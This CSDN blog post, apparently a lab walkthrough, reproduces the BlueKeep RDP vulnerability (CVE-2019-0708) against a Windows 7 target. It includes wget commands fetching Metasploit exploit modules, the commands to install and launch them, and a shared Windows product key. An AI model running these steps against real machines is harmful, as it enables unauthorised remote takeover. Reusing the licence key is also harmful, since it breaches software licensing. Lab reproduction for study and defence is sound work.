2019输入序列号闪退_CVE-2019-0708 BlueKeep远程桌面代码执行漏洞复现

最新推荐文章于 2024-06-10 22:53:12 发布
最新推荐文章于 2024-06-10 22:53:12 发布
阅读量122 收藏
点赞数
文章标签: 2019输入序列号闪退
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39564617/article/details/111629255
版权

1、前言

CVE-2019-0708 远程桌面代码执行漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过入RDP协议(3389端口)进行连接发送恶意代码到电脑中去。

这个漏洞最早在5月份被曝光了,9月初就有POC代码公布了,一直没有时间实践一下。

2、漏洞影响的系统

  • Windows 7
  • Windows Server 2008 R2
  • Windows Server 2008
  • Windows Sever 2003
  • Windows XP

3、靶机环境搭建

本次复现的靶机环境为 Windows 7 SP1的旗舰版

靶机下载:

链接: https://pan.baidu.com/s/14aSIZgOebdLmeI2l9lGx_w 提取码: bw7m

e4901044d568ca5ddcfbc50f2c90924d.png

升级一下系统版本

1b5190d3c2ce6167111273ca4b3ed3f1.png

输入序列号:

6K2KY-BFH24-PJW6W-9GK29-TMPWP

开启远程桌面服务

df332075ca9255dd42f5bb4fa97475df.png

e046306e534bb385a5fbadbff5d49d28.png

查看靶机IP地址

a40d44eb30cc250cb052a861536c96df.png

4、攻击机Kali2019配置

下载POC攻击代码

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb 

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb 

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb 

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

593f0133c12b2f5041f3964bbb87f8a9.png

将POC复制到msf中对应的路径

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

文件夹不存在的,需要手工添加

3289867ed48da425e976b5e7c449739f.png

5、漏洞利用

启动msf,使用reload_all重新加载0708的利用模块

701c764e8ffc441c9f6184d8d9237abb.png

探测目标端口,开放3389端口

4b3b6305abe6a2d93e52b37673abd657.png

搜寻bluekeep利用模块

b979c307f401ee24b210eeb6bea071a9.png

使用exp攻击利用模块

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

查看options

2558c06f14449b6d548899a1feb195b7.png

配置靶机IP

640471c5ffd564e16070dc4333982611.png

查看target,设置target为3

368b6fa296ce5e6e225a762ff53e54b6.png

开始攻击

432e217da3d5edc29f43092dcd2f0474.png

就这么简单地成功获得了shell。

在复现过程中可能会出现导致靶机蓝屏重启,没办法获取shell,多试几次就行

e21d66c8214e13ceb8ef4eca92905f2c.png
weixin_39564617
关注
远程桌面漏洞poc_CVE20190708 bluekeep 漏洞研究分析详细完整版
weixin_39989862的博客
12-03 845
本文为看雪论坛精华文章看雪论坛作者ID:MSA_Li一、概括这个漏洞是微软在2019年被披露的漏洞中安全威胁最高的一个,在写本文之前,网上已经存在可以直接使用的poc,但质量参差不齐,而微软也及时修补了该漏洞。这个漏洞主要涉及微软win7(x64/x86/server)和winXP(x64/x86)的远程桌面服务,漏洞分类为UAF。远程桌面连接过程中包含几个协议,RDP,T.124,T...
CVE-2019-0708远程桌面漏洞复现
weixin_43806577的博客
08-26 5529
一、CVE-2019-0708漏洞简介 CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 二、测试环境 Kali虚拟机、Windows Server 2008 R2 64位(Windows服务器需开启远程桌面服务)、windows 7 64位(开启远程桌面服务) 三、测试过程 (1)查看IP Kali的IP地址为1...
CVE-2019-0708 BlueKeep远程桌面代码执行漏洞靶机复现
weixin_56306210的博客
09-26 246
CVE-2019-0708 BlueKeep远程桌面代码执行漏洞靶机复现
Remote Desktop Service (RDS) 远程桌面服务漏洞简介 BlueKeep DejaBlue BlueGate
A Little Bean
09-13 1616
Remote Desktop Service (RDS) 远程桌面服务漏洞简介 BlueKeep DejaBlue BlueGate
RDP bluekeep远程代码执行漏洞(CVE-2019-0708)的环境搭建
aweiweiweiei1的博客
07-19 214
RDP bluekeep远程代码执行漏洞(CVE-2019-0708)的地址 https://zhuanlan.zhihu.com/p/83801198
0708远程桌面代码执行漏洞复现
independe的博客
09-14 310
Exp 攻击工具准备 1.使用如下命令一键安装metasploit-framework (msf) curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework- wrappers/msfupdate.erb > msfinstall...
CVE-2019-0708:3389远程桌面代码执行扩展CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)
02-05
微软3389远程漏洞CVE-2019-0708批量检测工具 0x001 Win下检测 https://github.com/robertdavidgraham/rdpscan C:\Users\K8team\Desktop\rdpscan-master\vs10\Release 的目录 2019/06/02 02:11 <DIR> . 2019/06/02 02...
msfconsole利用Windows server2008cve-2019-0708漏洞入侵
最新发布
Idealismi的博客
06-10 631
微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的,堪比WannaCry。
CVE-2019-0708BlueKeep漏洞分析与复现
热门推荐
未完成的歌~的博客
03-14 1万+
文章目录一、 漏洞简介1、漏洞介绍:2、漏洞原理:3、影响版本:二、 漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的漏洞模块:3、对靶机进行漏洞扫描:4、使用攻击模块,对靶机进行攻击5、使用POC,进行蓝屏攻击 一、 漏洞简介 1、漏洞介绍: 2019年5月14日微软官方发布安全补丁,修复了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证,无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用,与2017年 WannaCr
MSF路由转发
baidu_38844729的博客
11-29 958
前言 已经拿下一台内网服务器的控制权,想要用msf去访问内网资源,可以在msf中添加路由 msf访问内网实现的条件: 1.获得一个msf的session会话 2.在msf中添加内网网段的路由 步骤 1.msf反弹shell,获取session会话,具体过程可以参考:https://blog.csdn.net/baidu_38844729/article/details/109940441,我已经获得了会话, 2.添加路由 route add 0.0.0.0 0.0.0.0 session ID #分别为
cve_2019_0708_bluekeep远程桌面漏洞复现
帅醉了的博客
01-21 1048
cve_2019_0708_bluekeep远程桌面漏洞复现 0x00_简介 2019年5月14日,微软发布了本月安全更新补丁,其中修复了远程桌面协议(RDP)远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,向目标Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。由于该漏洞存在于RDP协议的预身份验证阶段,因此漏洞利用无需进行用户交互操作。该漏洞存在被不法分子利用进行蠕虫攻击的...
CVE-2019-0708 远程桌面代码执行漏洞复现
a1b2c3是弱口令
09-07 7431
0X00 靶机 漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统,一下就ojbk,你们没有,就下载装吧! 使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统): ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557...
cve-2019-0708 exp 漏洞复现(bluekeep rce)
qq_39541626的博客
09-07 7012
cve-2018-0708漏洞复现 我用的msf 4.11升级的msf5 升级命令为 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wr...
红日靶场--内网渗透练习
Nailaoyyds的博客
04-21 4190
环境介绍: 内网 kali 192.168.171.137 win7 192.168.171.153 192.168.52.130 win2003 192.168.52.131 win2008 192.168.52.138 信息收集 内网主机存...
Windows远程桌面代码执行漏洞复现(CVE-2019-0708)
whh6tl的博客
07-25 4462
漏洞简介: 2019年5月14日微软官方发布安全补丁,修复了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。 威胁类型 远程代码执行 威胁等级 高 漏洞编号 CVE-2019-0708 受影响系统及应用版本 Windows 7 Windows server 2008 R2 Windows server 2008
cve_2019_0708_bluekeep_rce漏洞复现
qq_53062209的博客
02-13 4686
1、漏洞介绍 CVE-2019-0708漏洞是添加了一个漏洞利用模块,该模块通过RDP利用远程Windows内核释放后使用漏洞。rdp termdd.sys驱动程序未正确处理绑定到仅限内部的通道ms_t120,从而允许格式错误的断开连接提供程序指示消息导致释放后被使用。利用可控制的数据和远程非分页面池堆喷射,使用空闲信道的间接调用小工具来实现任意代码执行。 2、漏洞复现之前要准备一台win7操作系统或者一下的操作系统电脑均可 Windows 7 Windows Server 2008 R2 W
CVE-2019-19781 Citrix漏洞:远程代码执行详解与检测
"本文将深入探讨CVE-2019-19781漏洞,该漏洞影响了Citrix Application Delivery Controller(ADC)和Citrix Gateway,可能导致远程代码执行(RCE)。我们将分析漏洞的成因、检测方法以及利用示例,帮助读者了解其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值